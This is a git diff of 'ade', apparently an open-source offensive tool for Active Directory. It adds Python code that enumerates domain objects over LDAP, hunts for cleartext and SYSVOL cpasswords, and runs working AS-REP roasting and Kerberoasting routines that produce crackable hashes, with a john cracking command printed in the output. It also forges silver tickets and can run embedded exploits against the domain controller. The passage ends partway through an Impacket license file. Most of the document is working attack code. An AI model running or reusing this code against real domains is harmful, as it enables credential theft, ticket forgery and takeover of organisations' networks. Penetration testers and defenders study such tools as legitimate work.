imbedded exploits') - sys.exit(0) - - if not args.dc: - print("--dc argument is required") - sys.exit(0) - - # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy - domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$') - userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$') - - domainMatch = domainRE.findall(args.dc) - - if not domainMatch: - print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"') - sys.exit(1) - - if args.all: - args.smb = True - args.kerberos_preauth = True - args.bloodhound = True - args.spn = True - if args.no_creds: - args.user = False - else: - userMatch = userRE.findall(args.user) - if not userMatch: - print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"') - sys.exit(1) - - - # Boolean flow control flags - file_to_write = args.out_file if args.out_file else f'{args.dc}' - - enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.user) - - # Just print a blank line for output sake - print('') diff --git a/ade/__main__.py b/ade/__main__.py index 42cee26..fc60bea 100644 --- a/ade/__main__.py +++ b/ade/__main__.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -import ade +from ade import ade import sys ade.main(sys.argv) \ No newline at end of file diff --git a/ade/ade.py b/ade/ade.py new file mode 100644 index 0000000..90cf41a --- /dev/null +++ b/ade/ade.py @@ -0,0 +1,540 @@ +#!/usr/bin/env python3 +from ldap3 import Server, Connection, ALL, ALL_ATTRIBUTES, LEVEL, SUBTREE, ALL_OPERATIONAL_ATTRIBUTES +from ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError +from ldap3.core.exceptions import LDAPKeyError +from impacket.smbconnection import SessionError +from impacket.nmb import NetBIOSTimeout, NetBIOSError +from getpass import getpass +from termcolor import colored +from impacket import smbconnection +from impacket.dcerpc.v5 import srvs, epm +import contextlib, argparse, sys, socket, json, re, os, base64 +from dns.resolver import NXDOMAIN +import textwrap + +# Thanks SecureAuthCorp for GetNPUsers.py +# For Kerberos preauthentication +from impacket.krb5 import constants +from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter +from impacket.krb5.kerberosv5 import sendReceive, KerberosError +from impacket.krb5.types import KerberosTime, Principal +from pyasn1.codec.der import decoder, encoder +from pyasn1.type.univ import noValue +from binascii import hexlify +import datetime, random +from .modEnumerator.modEnumerator import ModEnumerator +from .connectors.connectors import Connectors +from .utils.utils import Utils + +# Thanks SecureAuthCorp for GetUserSPNs.py +# For SPN enum +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS +from impacket.ntlm import compute_lmhash, compute_nthash +from impacket.krb5.asn1 import TGS_REP + +from bloodhound import BloodHound, resolve_collection_methods +from bloodhound.ad.domain import AD +from bloodhound.ad.authentication import ADAuthentication + + +class EnumAD(): + + def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, exploits, silvertgt, domuser=None): + self.server = domainController + self.domuser = domuser + self.ldaps = ldaps + self.output = output if output is not None else domainController + self.bhout = bhout + self.kpre = kpre + self.spnEnum = spnEnum + self.enumsmb = enumsmb + self.searchSysvol = searchSysvol + self.silvertgt = silvertgt + + self.ou_structure = domainController.split('.') + self.dc_string='' + for element in self.ou_structure: + self.dc_string += 'dc={},'.format(element) + + # LDAP properties + # At the moment we just want everything + self.ldapProps = ["*"] + + # Initialize modules + self.connectors = Connectors() + self.enumerator = ModEnumerator() + self.utils = Utils() + + # Setting lists containing elements we want from the domain controller + self.computers = [] + self.people = [] + self.groups = [] + self.spn = [] + self.acl = [] + self.gpo = [] + self.domains = [] + self.ous = [] + self.deletedUsers = [] + self.passwd = False + self.passwords = {} + # Holds the values of servers that has been fingerprinted to a particular service + self.namedServers = {} + + # TODO: Figure a good way to go through the code dryrun + if dryrun: + print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string) + return + + if domuser is not False: + self.runWithCreds() + else: + self.runWithoutCreds() + + self.enumNULLSessions() + self.enumDeleted() + self.enumerate_names() + self.checkForPW() + self.checkOS() + self.write_file() + if exploits: + self.testExploits() + + # Unbind the connection to release the handle + self.conn.unbind() + + + def runWithCreds(self): + self.CREDS = True + if not self.passwd: + self.passwd = str(getpass()) + self.bind() + self.search() + + if self.searchSysvol: + self.checkSYSVOL() + + if self.bhout: + self.outputToBloodhoundJson() + + if self.kpre: + self.enumKerbPre() + + if self.spnEnum: + self.enumSPNUsers() + + if self.enumsmb: + # Setting variables for further testing and analysis + self.smbShareCandidates = [] + self.sortComputers() + self.enumSMB() + + # Lets clear variable now + self.passwd = None + + return + + + def runWithoutCreds(self): + self.CREDS = False + print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials') + self.passwd = '' + self.domuser = '' + print('') + + self.bind() + self.search() + + self.enumForCreds(self.people) + + return + + + @contextlib.contextmanager + def suppressOutput(self): + with open(os.devnull, 'w') as devnull: + with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out: + yield (err, out) + + + def enumDeleted(self): + if len(self.deletedUsers) > 0: + print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') + self.enumForCreds(self.deletedUsers) + + + def enumNULLSessions(self): + self.enumerator.enumNULLSessions(self.server, self.connectors) + + + def testExploits(self): + from .exploits import exploits + print('[ ' + colored('INFO', 'green') +' ] Attempting to run imbedded exploits...') + exp = exploits.Exploits() + exp.run(self.server, self.computers[0]["name"]) + + if len(exp.vulnerable) > 0: + cves = "" + for exploit in exp.vulnerable: + cves += f"{exploit}, " + print('[ ' + colored('WARN', 'yellow') + f' ] DC may be vulnerable to: [ ' + colored(cves[:-2], 'green') + ' ]') + else: + print('[ ' + colored('OK', 'green') + ' ] DC not vulnerable to included exploits') + + + def bind(self): + try: + if self.ldaps: + self.conn = self.connectors.ldap_connector(self.server, True, self.domuser, self.passwd) + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server)) + else: + self.conn = self.connectors.ldap_connector(self.server, False, self.domuser, self.passwd) + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server)) + except (LDAPBindError, LDAPSocketOpenError): + if self.ldaps: + print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server)) + else: + print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server)) + sys.exit(1) + + + def search(self): + # Get computer objects + self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.computers.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Computer objects') + + # Get person objects + self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.people.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Person objects') + + # Get group objects + self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.groups.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Group objects') + + # Get SPN objects + self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.spn.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all SPN objects') + + # Get ACL objects + self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.acl.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all ACL objects') + + # Get GPO objects + self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.gpo.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all GPO objects') + + # Get Domain + self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.domains.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Domains') + + # Get OUs + self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.ous.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all OUs') + + # Get deleted users + self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)]) + for entry in self.conn.entries: + self.deletedUsers.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all deleted users') + + + def enumerate_names(self): + self.namedServers = self.enumerator.enumerate_server_names(self.computers) + # TODO + + + ''' + Since it sometimes is real that the property 'userPassword:' is set + we test for it and dump the passwords + ''' + def checkForPW(self): + passwords = self.enumerator.enumerate_for_cleartext_passwords(self.people, self.server) + self.passwords = { **passwords, **self.passwords } + + if len(self.passwords.keys()) > 0: + with open(f'{self.output}-clearpw', 'w') as f: + json.dump(self.passwords, f, sort_keys=False) + + if len(self.passwords.keys()) == 1: + print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) + elif len(self.passwords.keys()) == 0: + print('[ ' + colored('OK', 'green') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) + else: + print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(self.passwords.keys()))) + + + ''' + While it is not unusual to find EOL servers hidden or forgotten these + often makes easier targets for lateral movemen, and because of that + we'll dump the lowest registered OS and the respective hosts for easier + enumeration afterwards + ''' + def checkOS(self): + os_json = self.enumerator.enumerate_os_version(self.computers) + + for key, value in os_json.items(): + if len(value) == 0: + continue + with open(f'{self.output}-oldest-OS', 'w') as f: + for item in value: + f.write('{0}: {1}\n'.format(key, item)) + break + + print('[ ' + colored('OK', 'green') + f' ] Wrote hosts with oldest OS to {self.output}-oldest-OS') + + + def checkSYSVOL(self): + cpasswords = self.enumerator.enumSYSVOL(self.server, self.connectors, self.domuser, self.passwd) + + if len(cpasswords.keys()) > 0: + with open('{0}-cpasswords.json'.format(self.server), 'w') as f: + json.dump(cpasswords, f) + + if len(cpasswords.keys()) == 1: + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys()))) + else: + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys()))) + + + def outputToBloodhoundJson(self): + print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...') + try: + with self.suppressOutput(): + opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server) + auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server) + try: + ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False) + ad.dns_resolve(kerberos=False, domain=self.server, options=opts) + except (NXDOMAIN) as e: + # So we didnt succeed with DNS lookup. Most likely an internal, so lets try to point to the DC + print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver') + try: + ns = socket.gethostbyname(self.server) + opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns) + ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False) + ad.dns_resolve(kerberos=False, domain=self.server, options=opts) + except (NXDOMAIN) as e: + # I'm all out of luck + print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver') + exit(1) + with self.suppressOutput(): + bloodhound = BloodHound(ad) + bloodhound.connect() + collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote') + bloodhound.run(collect=collection, num_workers=40, disable_pooling=False) + print('[ ' + colored('OK', 'green') +' ] BloodHound output generated') + except Exception as e: + print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}') + + + def sortComputers(self): + for computer in self.computers: + try: + if computer['dNSHostName'] not in self.smbShareCandidates: + self.smbShareCandidates.append(computer['dNSHostName']) + except LDAPKeyError: + # No dnsname registered + continue + if len(self.smbShareCandidates) == 1: + print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates))) + else: + print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates))) + + + def enumSMB(self): + smbBrowseable = self.enumerator.enumSMB(self.connectors, self.smbShareCandidates, self.server, self.domuser, self.passwd) + + availDirs = [] + for key, value in smbBrowseable.items(): + for _, v in value.items(): + if v: + availDirs.append(key) + + if len(self.smbShareCandidates) == 1: + print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} share with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(smbBrowseable.keys()), len(availDirs), self.domuser)) + else: + print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} shares with {2} subdirectories/file are browseable by {3}'.format(len(self.smbShareCandidates), len(smbBrowseable.keys()), len(availDirs), self.domuser)) + if len(smbBrowseable.keys()) > 0: + self.utils.WriteFiles(self.output, smbBrowseable, 'open-smb.json') + + + def write_file(self): + files_to_write = { + "users": self.people, + "computers": self.computers, + "groups": self.groups, + "spn": self.spn, + "acl": self.acl, + "gpo": self.gpo, + "domains": self.domains, + "ous": self.ous, + "deletedUsers": self.deletedUsers + } + for name, collection in files_to_write.items(): + self.utils.WriteFiles(self.output, collection,name) + + + def enumKerbPre(self): + hashes = self.enumerator.enumASREPRoast(self.conn, self.server, self.dc_string[:-1]) + + if len(hashes) > 0: + self.utils.WriteFiles(self.output, hashes, 'ASREPHashes') + print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server)) + else: + print('[ ' + colored('OK', 'green') +' ] Got 0 hashes') + + + def enumSPNUsers(self): + user_tickets = self.enumerator.enumKerberoast(self.spn, self.domuser, self.passwd) + + if len(user_tickets.keys()) > 0: + if self.silvertgt: + for _, value in user_tickets: + self.silverTicket(value.split('$')[-2]) + self.utils.WriteFiles(self.output, user_tickets, 'spn-tickets') + + if len(user_tickets.keys()) == 1: + print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) + else: + print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) + else: + print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys()))) + + + def goldenTicket(self): + from .attacks.ticketer import ticketer + # TODO + + + def silverTicket(self, nthash): + from .attacks.ticketer import ticketer + opts = argparse.Namespace(debug=False, aesKey=None, nthash=nthash, keytab=None, request=False, hashes=None, spn=None, domain_sid=str(self.domains[0]["objectSid"]), user_id=500, groups="513, 512, 520, 518, 519", duration=3650, extra_sid=None, dc_ip=socket.gethostbyname(self.server)) + tickets = ticketer.TICKETER('ade', '', self.domuser.split('@')[1], opts) + result = tickets.run() + if result: + print('[ ' + colored('WARN', 'yellow') + ' ] Created Silver Ticket for user "ade" and wrote to ade.ccache') + + + def enumForCreds(self, ldapdump): + advance, self.passwords = self.enumerator.enumForCreds(self.CREDS, self.passwords, ldapdump, self.connectors, self.server) + + if advance: + self.domuser = str(list(self.passwords.keys())[0]) + self.passwd = str(self.passwords[self.domuser]) + self.runWithCreds() + return + + +def main(args): + parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(''' + ___ __ _ ____ _ __ ______ + / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___ + / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\ + / ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / / + /_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/ + /____/ + + /*----------------------------------------------------------------------------------------------------------*/ + + ''')) + parser.add_argument('--dc', type=str, help='Hostname of the Domain Controller') + parser.add_argument('-o', '--out-file', type=str, help='Name prefix of output files (default: the name of the dc)') + parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`') + parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true') + parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true') + parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true') + parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true') + parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true') + parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true') + parser.add_argument('--all', help='Run all checks', action='store_true') + parser.add_argument('--no-creds', help='Start without credentials', action='store_true') + parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. Used for testing params etc.', action='store_true') + parser.add_argument('--silvertgt', help='Attempts to get a Silver Ticket. Requires -spn', action='store_true') + parser.add_argument('--exploits', help='Run imbedded exploits', action='store_true') + parser.add_argument('--exploit', type=str, help='Show path to PoC exploit code') + parser.add_argument('--version', help='Print currently installed version', action='store_true') + + if len(args) == 1: + parser.print_help(sys.stderr) + sys.exit(0) + + args = parser.parse_args() + + if args.exploit: + from .exploits.exploits import Exploits + exp = Exploits() + queryResult = exp.query_exploits(args.exploit) + + if queryResult: + print('Exploit for: ' + colored(args.exploit.lower(), 'green') + f' can be found at: {queryResult}') + sys.exit(0) + else: + print(f'{args.exploit.lower()} not in imbedded exploits') + sys.exit(0) + + if args.version: + import pkg_resources + version = pkg_resources.require("ActiveDirectoryEnum")[0].version + print(f'ActiveDirectoryEnum (ade) version: {version}') + sys.exit(0) + + if not args.dc: + print("--dc argument is required") + sys.exit(0) + + if args.silvertgt and not args.spn: + print('--silvertgt requires -spn to run') + sys.exit(0) + + # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy + domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$') + userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$') + + domainMatch = domainRE.findall(args.dc) + + if not domainMatch: + print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"') + sys.exit(1) + + if args.all: + args.smb = True + args.kerberos_preauth = True + args.bloodhound = True + args.spn = True + args.exploits = True + args.sysvol = True + args.silvertgt = True + if args.no_creds: + args.user = False + else: + userMatch = userRE.findall(args.user) + if not userMatch: + print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"') + sys.exit(1) + + + # Boolean flow control flags + file_to_write = None + if args.out_file: + file_to_write = args.out_file + + EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.exploits, args.silvertgt, args.user) + + # Just print a blank line for output sake + print('') diff --git a/external/bloodhound/enumeration/__init__.py b/ade/attacks/asreproast/__init__.py old mode 100755 new mode 100644 similarity index 100% rename from external/bloodhound/enumeration/__init__.py rename to ade/attacks/asreproast/__init__.py diff --git a/ade/attacks/asreproast/asreproast.py b/ade/attacks/asreproast/asreproast.py new file mode 100644 index 0000000..36c4834 --- /dev/null +++ b/ade/attacks/asreproast/asreproast.py @@ -0,0 +1,76 @@ +from impacket.krb5 import constants +from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, AS_REP, seq_set, seq_set_iter +from impacket.krb5.kerberosv5 import sendReceive, KerberosError +from impacket.krb5.types import KerberosTime, Principal +from pyasn1.codec.der import decoder, encoder +from pyasn1.type.univ import noValue +from binascii import hexlify +import datetime, random + + +class AsRepRoast(): + + + def __init__(self): + pass + + + def RepRoast(self, server: str, usr: list): + + hashes = [] + # Build request for Tickets + clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value) + asReq = AS_REQ() + domain = str(server).upper() + serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value) + pacReq = KERB_PA_PAC_REQUEST() + pacReq['include-pac'] = True + encodedPacReq = encoder.encode(pacReq) + asReq['pvno'] = 5 + asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value) + asReq['padata'] = noValue + asReq['padata'][0] = noValue + asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) + asReq['padata'][0]['padata-value'] = encodedPacReq + + requestBody = seq_set(asReq, 'req-body') + + options = list() + options.append(constants.KDCOptions.forwardable.value) + options.append(constants.KDCOptions.renewable.value) + options.append(constants.KDCOptions.proxiable.value) + requestBody['kdc-options'] = constants.encodeFlags(options) + + seq_set(requestBody, 'sname', serverName.components_to_asn1) + seq_set(requestBody, 'cname', clientName.components_to_asn1) + + requestBody['realm'] = domain + + now = datetime.datetime.utcnow() + datetime.timedelta(days=1) + requestBody['till'] = KerberosTime.to_asn1(now) + requestBody['rtime'] = KerberosTime.to_asn1(now) + requestBody['nonce'] = random.getrandbits(31) + + supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) + + seq_set_iter(requestBody, 'etype', supportedCiphers) + + msg = encoder.encode(asReq) + + try: + response = sendReceive(msg, domain, server) + except KerberosError as e: + if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: + supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),) + seq_set_iter(requestBody, 'etype', supportedCiphers) + msg = encoder.encode(asReq) + response = sendReceive(msg, domain, self.server) + else: + print(e) + return None + + asRep = decoder.decode(response, asn1Spec=AS_REP())[0] + + hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())) + + return hashes \ No newline at end of file diff --git a/ade/attacks/kerberoast/__init__.py b/ade/attacks/kerberoast/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/ade/attacks/kerberoast/kerberoast.py b/ade/attacks/kerberoast/kerberoast.py new file mode 100644 index 0000000..dc65bae --- /dev/null +++ b/ade/attacks/kerberoast/kerberoast.py @@ -0,0 +1,59 @@ +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, KerberosError +from impacket.ntlm import compute_lmhash, compute_nthash +from impacket.krb5.types import Principal +from impacket.krb5.asn1 import TGS_REP +from impacket.krb5 import constants +from pyasn1.codec.der import decoder +from binascii import hexlify +from termcolor import colored + + +class Kerberoast(): + + + def __init__(self): + pass + + + def roast(self, domuser: str, passwd: str, userDomain: str, user: str, spn: str) -> dict: + + user_tickets = {} + # Get TGT for the supplied user + client = Principal(domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value) + try: + # We need to take the domain from the user@domain since it *could* be a cross-domain user + tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(passwd), compute_nthash(passwd), None, kdcHost=None) + + TGT = {} + TGT['KDC_REP'] = tgt + TGT['cipher'] = cipher + TGT['sessionKey'] = newSession + + try: + # Get the TGS + serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value) + tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']) + # Decode the TGS + decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0] + # Get different encryption types + if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value: + entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) + user_tickets[spn] = entry + elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: + entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) + user_tickets[spn] = entry + elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: + entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) + user_tickets[spn] = entry + elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value: + entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) + user_tickets[spn] = entry + + except KerberosError as err: + print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) + return None + except KerberosError as err: + print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) + return None + + return user_tickets \ No newline at end of file diff --git a/ade/attacks/ticketer/LICENSE b/ade/attacks/ticketer/LICENSE new file mode 100644 index 0000000..159cdd1 --- /dev/null +++ b/ade/attacks/ticketer/LICENSE @@ -0,0 +1,84 @@ +Licencing +--------- + +We provide this software under a slightly modified version of the +Apache Software License. The only changes to the document were the +replacement of "Apache" with "Impacket" and "Apache Software Foundation" +with "SecureAuth Corporation". Feel free to compare the resulting +document to the official Apache license. + +The `Apache Software License' is an Open Source Initiative Approved +License. + + +The Apache Software License, Version 1.1 +Modifications by SecureAuth Corporation (see above) + +Copyright (c) 2000 The Apache Software Foundation. All rights +reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in + the documentation and/or other materials provided with the + distribution. + +3. The end-user documentation included with the redistribution, + if any, must include the following acknowledgment: + "This product includes software developed by + SecureAuth Corporation (https://www.secureauth.com/)." + Alternately, this acknowledgment may appear in the software itself, + if and wherever such third-party acknowledgments normally appear. + +4. The names "Impacket", "SecureAuth Corporation" must + not be used to endorse or promote products derived from this + software without prior written permission. For written + permission, please contact oss@secureauth.com. + +5. Products derived from this software may not be called "Impacket", + nor may "Impacket" appear in their name, without prior written + permission of SecureAuth Corporation. + +THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED +WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES +OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR +ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF +USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +SUCH DAMAGE. + + + +Smb.py and nmb.py are based on Pysmb by Michael Teo +(https://miketeo.net/projects/pysmb/), and are distributed under the +following license: + +This software is provided 'as-is', 